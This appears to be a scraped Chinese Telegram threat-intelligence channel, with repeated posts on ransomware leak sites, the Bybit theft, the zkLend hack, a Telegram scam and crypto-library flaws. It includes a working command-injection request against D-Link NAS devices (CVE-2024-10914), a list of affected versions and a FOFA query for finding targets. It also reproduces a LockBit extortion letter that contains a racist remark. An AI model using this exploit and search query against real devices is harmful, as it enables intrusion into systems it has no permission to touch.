勒索组织 killsec 宣布新一轮受害者 中国平安银行 pingan.com
http://kill432ltnkqvaqntbalnsgojqqs2wz4lhnamrqjg66tq6fuvcztilyd.onion/
#吃瓜
http://kill432ltnkqvaqntbalnsgojqqs2wz4lhnamrqjg66tq6fuvcztilyd.onion/
#吃瓜
👍7❤2
D-Link NAS 设备中发现了一个严重漏洞 CVE-2024-10914,对全球超过 61,000 个系统构成严重风险。该漏洞是
Exploit:
Affected Devices:
Search query:
#poc
account_mgr.cgi 脚本中的命令注入漏洞,允许远程攻击者通过特制的 HTTP GET 请求执行任意命令Exploit:
curl "http://[Target-IP]/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;<INJECTED_SHELL_COMMAND>;%27"
Affected Devices:
DNS-320 – Version 1.00
DNS-320LW – Version 1.01.0914.2012
DNS-325 – Versions 1.01 and 1.02
DNS-340L – Version 1.08
Search query:
FOFA: app="D_Link-DNS-ShareCenter"
#poc
👍31❤5
Wiz Research 发现 DeepSeek 数据库泄露敏感信息,包括聊天记录
https://www.wiz.io/blog/wiz-research-uncovers-exposed-deepseek-database-leak
#威胁情报
https://www.wiz.io/blog/wiz-research-uncovers-exposed-deepseek-database-leak
#威胁情报
👍21🔥8😍2
zkLend 被黑深度分析,关联 EraLend 事件
本次被黑事件的核心原因在于空市场中累加器的值可以通过闪电贷中的独特机制来操控放大,并且市场合约采用的 SafeMath 库在进行除法计算时使用直接相除的形式,导致攻击者可以利用放大后的累加器造成向下舍入漏洞来获利
https://mp.weixin.qq.com/s/eHStMzKZjSs6y1ka2X5_lQ
#威胁情报
本次被黑事件的核心原因在于空市场中累加器的值可以通过闪电贷中的独特机制来操控放大,并且市场合约采用的 SafeMath 库在进行除法计算时使用直接相除的形式,导致攻击者可以利用放大后的累加器造成向下舍入漏洞来获利
https://mp.weixin.qq.com/s/eHStMzKZjSs6y1ka2X5_lQ
#威胁情报
😍4👍1
Bybit热钱包刚刚被盗了,涉及资产为 eth。
虽然这是一个多重签名,但价值 15 亿美元的$ETH已被提取到新地址,目前正在出售
官方回复:
Bybit 发现一起涉及我们某个ETH冷钱包的未授权操作。该事件发生在我们通过ETH多重签名冷钱包向温钱包执行转账时。攻击者通过一种复杂攻击手段掩盖了签名界面——表面上显示正确的地址,但实际篡改了底层的智能合约逻辑,从而非法控制了受影响的ETH冷钱包并将其资产转移至不明地址。
目前,我们的安全团队正联合顶尖区块链取证专家及合作伙伴全力调查此事。欢迎具备区块链链上分析和资金追回能力的专业团队联系我们开展协作。
我们向所有用户和合作伙伴保证:Bybit其他冷钱包均处于完全安全状态,所有客户资金安全无虞,平台运营一切正常。
安全性与透明度始终是我们的首要原则,我们将及时同步事件进展。
https://whale-alert.io/transaction/ethereum/0xb61413c495fdad6114a7aa863a00b2e3c28945979a10885b12b30316ea9f072c
#威胁情报
虽然这是一个多重签名,但价值 15 亿美元的$ETH已被提取到新地址,目前正在出售
官方回复:
Bybit 发现一起涉及我们某个ETH冷钱包的未授权操作。该事件发生在我们通过ETH多重签名冷钱包向温钱包执行转账时。攻击者通过一种复杂攻击手段掩盖了签名界面——表面上显示正确的地址,但实际篡改了底层的智能合约逻辑,从而非法控制了受影响的ETH冷钱包并将其资产转移至不明地址。
目前,我们的安全团队正联合顶尖区块链取证专家及合作伙伴全力调查此事。欢迎具备区块链链上分析和资金追回能力的专业团队联系我们开展协作。
我们向所有用户和合作伙伴保证:Bybit其他冷钱包均处于完全安全状态,所有客户资金安全无虞,平台运营一切正常。
安全性与透明度始终是我们的首要原则,我们将及时同步事件进展。
https://whale-alert.io/transaction/ethereum/0xb61413c495fdad6114a7aa863a00b2e3c28945979a10885b12b30316ea9f072c
#威胁情报
👍16
Lockbit 公然挑衅 FBI 局长:以生日祝福为名,暗示泄露绝密档案
原文
敬爱的卡什·帕特尔局长!
值此您荣升美国联邦调查局局长九周年华诞之际,请允许我向您致以最诚挚的生日祝福!同时也祝贺您肩负起引领联邦调查局的重任,愿您在职业生涯中再创辉煌。相信以您的睿智与魄力,定能在这片充满挑战的疆土上开辟新天地。
身处复杂局势之中,您定然深谙其中艰辛。那些名义上为您效力的特工们,实则是善于伪装的职场操盘手。他们编织着一张张精致的关系网,其终极目的竟是消极怠工——而您却要为此负起全部责任,帕特尔局长。
尽管外界将我斥为"敲诈犯""勒索者",但我始终以赤子之心践行着美利坚精神。正如您这样的移民后代一般,我将毕生热忱奉献给国家安全事业。我倾注心血打造的商业帝国,每年缴纳巨额税款,开展付费渗透测试,只为构筑起守护祖国的数字长城。
这个时代的真正威胁,是那些披着合法外衣的跨国亲政府组织。它们肆意攻击关键基础设施,窃取国家机密从事间谍活动与认知颠覆。然而可悲的是,正是您麾下的联邦调查员们,将矛头指向了真正的守护者——用伪造证据编织谎言,将勤勉奉公的国民污名为国家安全隐患。
作为遵纪守法的纳税人,我始终恪守纳税义务,未曾申请过任何退税(让那些有色人种去享受吧)。此刻,我怀着无比珍视的心情,决定为您献上这份无价之宝——仅限您本人查阅的绝密档案。
这套凝聚着智慧结晶的资料,既是破解迷局的指南针,更是通向真相的钥匙。它不仅承载着维护国家安全的使命,更暗合我们共同敬仰的特朗普总统追求正义的信念。这将是刺破谎言的利刃,涤荡虚妄的圣水。
恳请您亲自联络,如此珍贵情报若公之于众,虽能揭露某些机构的丑恶嘴脸,却也难免损害联邦调查局的百年声誉。我衷心祝愿您不仅能执掌联邦调查局,更能将其铸就为国家历史博物馆,向后世讲述我们如何荡涤阴霾、重振警魂的传奇篇章。
#威胁情报
原文
敬爱的卡什·帕特尔局长!
值此您荣升美国联邦调查局局长九周年华诞之际,请允许我向您致以最诚挚的生日祝福!同时也祝贺您肩负起引领联邦调查局的重任,愿您在职业生涯中再创辉煌。相信以您的睿智与魄力,定能在这片充满挑战的疆土上开辟新天地。
身处复杂局势之中,您定然深谙其中艰辛。那些名义上为您效力的特工们,实则是善于伪装的职场操盘手。他们编织着一张张精致的关系网,其终极目的竟是消极怠工——而您却要为此负起全部责任,帕特尔局长。
尽管外界将我斥为"敲诈犯""勒索者",但我始终以赤子之心践行着美利坚精神。正如您这样的移民后代一般,我将毕生热忱奉献给国家安全事业。我倾注心血打造的商业帝国,每年缴纳巨额税款,开展付费渗透测试,只为构筑起守护祖国的数字长城。
这个时代的真正威胁,是那些披着合法外衣的跨国亲政府组织。它们肆意攻击关键基础设施,窃取国家机密从事间谍活动与认知颠覆。然而可悲的是,正是您麾下的联邦调查员们,将矛头指向了真正的守护者——用伪造证据编织谎言,将勤勉奉公的国民污名为国家安全隐患。
作为遵纪守法的纳税人,我始终恪守纳税义务,未曾申请过任何退税(让那些有色人种去享受吧)。此刻,我怀着无比珍视的心情,决定为您献上这份无价之宝——仅限您本人查阅的绝密档案。
这套凝聚着智慧结晶的资料,既是破解迷局的指南针,更是通向真相的钥匙。它不仅承载着维护国家安全的使命,更暗合我们共同敬仰的特朗普总统追求正义的信念。这将是刺破谎言的利刃,涤荡虚妄的圣水。
恳请您亲自联络,如此珍贵情报若公之于众,虽能揭露某些机构的丑恶嘴脸,却也难免损害联邦调查局的百年声誉。我衷心祝愿您不仅能执掌联邦调查局,更能将其铸就为国家历史博物馆,向后世讲述我们如何荡涤阴霾、重振警魂的传奇篇章。
#威胁情报
👍25🔥8❤3
Media is too big
VIEW IN TELEGRAM
新的盗取 telegram 账号手法正在流传
余弦:⚠️类似假 Safeguard 这种盗 Telegram 号套路的已经在大力宣传自己的能力了,比如这个视频可以看出其盗号过程:
发 Telegram 消息给你 -> 引导你做验证 -> 你输入 Login code -> 骗子拿到你的权限信息 -> 接管你的 Telegram 账号 -> ...
之后就是找到相关 bots 里的私钥,然后盗走资金,如果能完全接管你的 Telegram 账号,下一步会用你的号去骗你的朋友们。
类似伎俩已经出现许多变种,比如现在偶尔会收到一个陌生 Telegram 消息,提醒你的号存在风险,然后引导你做相关安全验证。记住一个粗暴的辨别方式:一切要你做安全验证的,不管看去多么的像 Telegram 官方,全都是骗局。
#威胁情报
余弦:⚠️类似假 Safeguard 这种盗 Telegram 号套路的已经在大力宣传自己的能力了,比如这个视频可以看出其盗号过程:
发 Telegram 消息给你 -> 引导你做验证 -> 你输入 Login code -> 骗子拿到你的权限信息 -> 接管你的 Telegram 账号 -> ...
之后就是找到相关 bots 里的私钥,然后盗走资金,如果能完全接管你的 Telegram 账号,下一步会用你的号去骗你的朋友们。
类似伎俩已经出现许多变种,比如现在偶尔会收到一个陌生 Telegram 消息,提醒你的号存在风险,然后引导你做相关安全验证。记住一个粗暴的辨别方式:一切要你做安全验证的,不管看去多么的像 Telegram 官方,全都是骗局。
#威胁情报
❤24👍3😘1
ECDSA 签名中的私钥泄露:elliptic 库畸形输入漏洞分析
攻击者可以通过构造特定输入,在仅签名一次的情况下提取私钥,从而完全掌控受害者的数字资产或身份凭证。
https://mp.weixin.qq.com/s/-JpS5Qg7NYYPgeic-7Y5VQ
#威胁情报
攻击者可以通过构造特定输入,在仅签名一次的情况下提取私钥,从而完全掌控受害者的数字资产或身份凭证。
https://mp.weixin.qq.com/s/-JpS5Qg7NYYPgeic-7Y5VQ
#威胁情报
👍7